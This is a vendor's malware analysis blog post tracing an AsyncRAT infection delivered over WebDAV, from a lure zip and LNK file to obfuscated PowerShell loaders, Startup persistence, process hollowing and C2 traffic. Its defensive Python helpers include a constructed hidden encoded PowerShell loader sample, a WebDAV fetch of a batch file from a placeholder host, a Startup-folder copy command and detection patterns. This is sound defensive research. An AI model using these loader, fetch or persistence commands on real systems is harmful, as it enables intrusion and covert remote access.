Cybersecurity Solutions - Cyber Security Platform | SenseOn

Caught in the WebDAV: A Journey Through An AsyncRat Infection

Reverse engineering the AsyncRat malware infection, exploring the means of deployment and staging.

Technique Background

Attackers use a wide array of techniques to deploy malware onto a target, including HTTP(S) file downloads and phishing attachments. WebDAV is an infrequently used protocol that can also achieve this goal. WebDAV was designed to make administering servers easier by giving administrators the ability to use existing tools, like Windows Explorer, to bring a familiar GUI to managing web server files.

In this blog we will walk through an example of how AsyncRAT was deployed via a trojan, using WebDAV as the delivery mechanism. A Remote Access Trojan (RAT) is a type of malware which gives an attacker remote control of a target system. After installation, it enables the attacker to monitor user activity, steal data, manipulate files, and execute commands. This can lead to further exploitation of systems or exfiltration of data.

Static Analysis

For this analysis we downloaded our samples from the online project operated by https://www.malware-traffic-analysis.net/. This project collects and shares malware samples with the community for security research. The sample is shared as a zip which we can load into a sandbox environment to perform our analysis. 

The malware was distributed via a Dropbox link that was shared in a way to entice users to click on it. Once clicked, the link initiated the download of a file named ‘aktuelle Rechnung.zip’ to the device; the name translates from German as ‘current invoice’.

The artefacts provided by malware-traffic-analysis show the device making a DNS request for the ‘dl.dropboxusercontent[.]com’ domain, with a download being made just after.

The downloaded zip archive contains a further file, an internet shortcut (URL file) named 'A1.net.rechnung'.

The contents of this file suggest that opening it will cause a further file named 'Modelo-34.pdf.lnk' to be downloaded from the domain ‘sunshine-bizrate-inc-software.trycloudflare[.]com’. This connection would be made over WebDAV, using a DavWWWRoot UNC path.

At first glance, the downloaded file appears to be a benign PDF. The icon and file type shown by Windows, however, suggest it is a shortcut file set to execute ‘cmd.exe’. The only way to identify this is by viewing the properties of the file.

The contents of this file suggest that another file, named ‘file.bat’, would be downloaded from the attacker domain (‘sunshine-bizrate-inc-software.trycloudflare[.]com’) using WebDAV. This is downloaded to the ‘Pictures’ directory and execution is then attempted using ‘SHELL32.dll’.

We can examine the contents of the file that was downloaded here, in order to understand what this batch file is attempting to do. 

The batch file performed a number of activities, including downloading and running ‘update.cmd’ and ‘windows.cmd’ files on the device. These operations were conducted via WebDAV and the 'copy' command, saving further files to the user's 'Pictures' directory.

The script also downloads a PDF file to the device and opens it, seemingly as a decoy, before moving another script to the Startup folder, likely to maintain persistence.

The persistence mechanism can be seen in the following ‘upgrade.bat’ script:

This batch file appears to be nearly identical to ‘file.bat’, and its purpose is to re-download and execute the ‘update.cmd’ and ‘windows.cmd’ files. As the script is placed in the user's Startup directory, it will execute automatically whenever the device is powered off and restarted. This persistence mechanism ensures that even if the device is cleaned up, the script will re-run and download a fresh copy of the malware, reintroducing the threat onto the system.

The ‘Windows_Update.bat’ file also checks whether Defender is running and, if it is, loads a different script from the command and control server.

From here on, the scripts were heavily obfuscated using a combination of string concatenation throughout the commands and several layers of base64 encoding.

De-obfuscation of ‘update.cmd’ suggests the following was executed:

The deobfuscated 'windows.cmd' and ‘update.cmd’ files have been analysed and suggest that the following is performed:

  • Setting up AES objects, which are then used to decrypt the data in the variable ‘qvsTw’

  • Decompressing the data using GZip

  • Loading the data into memory with the ‘[System.Reflection.Assembly]::Load()’ method

  • Execution of the code

From here on, the malware has been loaded into memory and will have executed in the absence of any endpoint protection capable of catching the execution of the program. At this point, to conduct any further analysis, we need to run components of this malware in a sandboxed environment and monitor the execution to identify how it works.
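As an added analyst helper for this post (not code from the original analysis or from SenseOn), the script below peels the base64 layers and string concatenation described above and then flags the AES/GZip/Assembly.Load loader pattern. The PowerShell sample it runs on is constructed for illustration, not the real ‘update.cmd’.

```python
import base64
import re

# Loader traits from the analysis above: AES, GZip, a base64 blob, in-memory load.
LOADER_INDICATORS = {
    "aes": re.compile(r"Cryptography\.Aes|AesManaged", re.I),
    "gzip": re.compile(r"GZipStream", re.I),
    "base64": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load\(", re.I),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def collapse_concatenation(script):
    """Join 'Sys'+'tem' style fragments until no quoted '+' joins remain."""
    joined = CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", script)
    return script if joined == script else collapse_concatenation(joined)

def decode_layer(token):
    """Decode one base64 token to text: UTF-16LE (-EncodedCommand style) or UTF-8."""
    try:
        raw = base64.b64decode(token, validate=True)
        if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
            return raw.decode("utf-16-le")
        return raw.decode("utf-8")
    except ValueError:  # not base64, or binary such as the AES ciphertext itself
        return None

def peel_layers(script, max_layers=10):
    """Swap every decodable base64 token for its plaintext, one layer at a time."""
    layers = 0
    for _ in range(max_layers):
        decoded = {t: d for t in B64_TOKEN.findall(script) if (d := decode_layer(t)) is not None}
        if not decoded:
            break
        for t, txt in decoded.items():
            script = script.replace(t, txt)
        script = collapse_concatenation(script)
        layers += 1
    return script, layers

def score_script(script):
    plain, layers = peel_layers(script)
    hits = [name for name, rx in LOADER_INDICATORS.items() if rx.search(plain)]
    return {"layers": layers, "indicators": hits, "suspicious": len(hits) >= 3}

# Constructed sample (not the real loader): concatenation, a UTF-16LE -enc layer, an outer UTF-8 layer.
INNER = ("$aes=New-Object System.Security.Cryptography.AesCryptoServiceProvider;"
         "$gz=New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress);"
         "iex ('[System.Refl'+'ection.Assembly]::Load($data)')")
LAYER1 = "powershell -w hidden -enc " + base64.b64encode(INNER.encode("utf-16-le")).decode()
SAMPLE = ("iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(LAYER1.encode()).decode() + "')))")
```

Binary tokens such as the encrypted payload itself are left in place, so the recovered text can be searched for the decryption routine without the analyst having to decode each layer by hand.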

Dynamic analysis

Unfortunately, by the time the analysis began, the command and control (C2) server ‘sunshine-bizrate-inc-software.trycloudflare[.]com’ was no longer serving data. Given the past use of this malware and the level of obfuscation seen here, this attack appears to be the work of a competent threat actor. This kind of malware has been used in targeted attacks in the past, although it is difficult to assess whether this particular case was targeted. If it was, the infrastructure has likely been taken down to prevent further analysis of the command and control server.

Fortunately, the sample we downloaded from malware-traffic-analysis contained a copy of the files likely downloaded from the C2. With these files in hand, we ran the second stage in a sandbox environment to identify the chain of events and gather further information about this attack.

The payload was deployed to the device by running the ‘file.bat’ file through Explorer. The screenshot below shows the SenseOn platform triggering a High Priority Case for the malware on execution. Our sandbox environment currently has EPP disabled; had EPP been enabled and running on this device, SenseOn software would have prevented any further execution.

We can investigate this case in a number of ways, including viewing the process tree within the SenseOn platform. The process tree shows that several programs were executed. This allows us to see the ‘explorer.exe’ process spawning ‘notepad.exe’ instances and hidden command prompts, which in turn lead to ‘PowerShell’ instances being run and, lastly, an ‘msedge’ instance. This is a much better way of looking at the chain of events and allows us to see everything performed by the malware.

We can also continue our investigation by reviewing the process telemetry from the device using Hunt Lab.

Once the ‘Modelo-34.pdf’ file is executed, we can observe it spawning multiple instances of the ‘notepad.exe’ program. These look to be sacrificial processes that will be hollowed out by the ‘[System.Reflection.Assembly]::Load()’ call in the ‘windows.cmd’ file identified in static analysis, and then used to run the malware. This technique is called ‘process hollowing’ and is an advanced method of detection evasion.

We can also see the ‘mmc.exe’ process being executed, leading to the further execution of ‘WF.msc’. This is the snap-in used for editing the firewall settings on the device.

From this point on, we can see in the network telemetry that the ‘notepad.exe’ process is attempting to make outbound network connections to the IP ‘91.92.252[.]234’ on port 3232. Unfortunately, as previously mentioned, the C2 server was down by the time the analysis was conducted, so only the attempted connections can be observed, with no upload or download of data.

Clearly, it is unusual for the Notepad process to be making network connections, and this only becomes more obvious when we check the IP address in threat intelligence and see that it has frequently been flagged as malicious in the past.

Further analysis shows this IP address resolves to the domain ‘limenet[.]io’, an anonymised web hosting platform located in the Netherlands.
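To show how the static findings (WebDAV ‘copy’ into Pictures, a script placed in the Startup folder) and the dynamic telemetry (Notepad opening sockets, a script host launching the firewall snap-in) translate into detection logic, here is an added example written for this post, not SenseOn platform code. The telemetry events, hostnames, IPs and paths are constructed placeholders rather than the infection's real indicators.

```python
import re

# Heuristics derived from the chain described above. The telemetry below is
# constructed; hostnames, IPs and paths are placeholders, not the real IOCs.
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(?:@SSL)?(?:@\d+)?\\DavWWWRoot\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
FIREWALL_SNAPIN = re.compile(r"\bwf\.msc\b", re.I)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Interactive tools that never need an outbound socket of their own.
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe"}

def triage(events):
    """Return (pid, rule) pairs for every telemetry event that matches a heuristic."""
    findings = []
    for ev in events:
        image = ev.get("image", "").lower()
        parent = ev.get("parent_image", "").lower()
        cmd = ev.get("command_line", "")
        if ev["type"] == "process":
            if WEBDAV_UNC.search(cmd):
                findings.append((ev["pid"], "webdav_unc_fetch"))
            if STARTUP_DIR.search(cmd):
                findings.append((ev["pid"], "startup_folder_persistence"))
            if image == "mmc.exe" and FIREWALL_SNAPIN.search(cmd) and parent in SCRIPT_HOSTS:
                findings.append((ev["pid"], "firewall_snapin_from_script"))
            if image in NO_NETWORK_IMAGES and parent in SCRIPT_HOSTS:
                findings.append((ev["pid"], "script_spawned_sacrificial_process"))
        elif ev["type"] == "network" and image in NO_NETWORK_IMAGES:
            findings.append((ev["pid"], f"outbound_connection_from_{image}"))
    return findings

# Constructed events mirroring the observed chain (plus one benign notepad launch).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4100, "image": "cmd.exe", "parent_image": "explorer.exe",
     "command_line": r'cmd.exe /c copy "\\webdav-host.example@SSL\DavWWWRoot\file.bat" "%USERPROFILE%\Pictures\"'},
    {"type": "process", "pid": 4120, "image": "cmd.exe", "parent_image": "cmd.exe",
     "command_line": r'cmd.exe /c copy upgrade.bat "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"'},
    {"type": "process", "pid": 4200, "image": "notepad.exe", "parent_image": "powershell.exe",
     "command_line": "notepad.exe"},
    {"type": "process", "pid": 4300, "image": "mmc.exe", "parent_image": "cmd.exe",
     "command_line": "mmc.exe WF.msc"},
    {"type": "network", "pid": 4200, "image": "notepad.exe", "dest_ip": "203.0.113.10", "dest_port": 3232},
    {"type": "process", "pid": 4400, "image": "notepad.exe", "parent_image": "explorer.exe",
     "command_line": r"notepad.exe C:\Users\user\notes.txt"},
]
```

The benign Notepad launch from Explorer produces no finding, while the hollowed instance is flagged twice: once for its script-host parent and once for the outbound connection.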

Conclusion

We have outlined the full execution process, starting from the user clicking on a link that was deceptively masquerading as a PDF file. This action triggered the download of an initial script, which in turn facilitated the retrieval of multiple files onto the targeted device. The malware utilised encryption techniques to load itself in a fileless manner, effectively bypassing traditional detection mechanisms and enabling remote access for the threat actor.

To mitigate this attack vector, organisations should focus on enhancing their detection and security measures. Advanced endpoint detection and response (EDR) solutions should be deployed to identify behaviours associated with fileless malware, such as unusual process spawning or encrypted file execution. Regular security awareness training is essential to help employees recognise phishing attempts. Since this attack vector leveraged WebDAV technology, securing these connections is critical. This can include enforcing encryption protocols (e.g. HTTPS), implementing strict access controls, and using Group Policy Objects (GPOs) to restrict WebDAV usage or monitor for suspicious file-link activities.

IOCs

  • 91.92.252[.]234

  • sunshine-bizrate-inc-software.trycloudflare[.]com

  • Modelo-34.pdf.lnk.bin (df019efc78f59c235dfdc568c52db8b5)

  • A1.net rechnung.url.bin (560c393ade4711048e3ef6778d60f3ae)

  • aktuelle Rechnung.zip (a5f42239bc514c1592a4407cf04c274e)

  • file.bat (152524d67ef46927a33b8a7149a7f60b)

  • file.ps1 (6bff8e7fd44581cf0be3ae26a36e9ed3)

  • loader.ps1 (d924535764653d4d497f8108eb3a73f6)

  • payload.ps1 (917fef2a008e78a5e636c189f86c878c)

  • update.cmd (25821577dc3c4fb26ad9459e6ea11c30)

  • windows.cmd (6f9a4373cca599a6b4d83408b2355da0)

  • Upgrade.bat (bf232dd0dccd2e49603dd49255ddcfc6)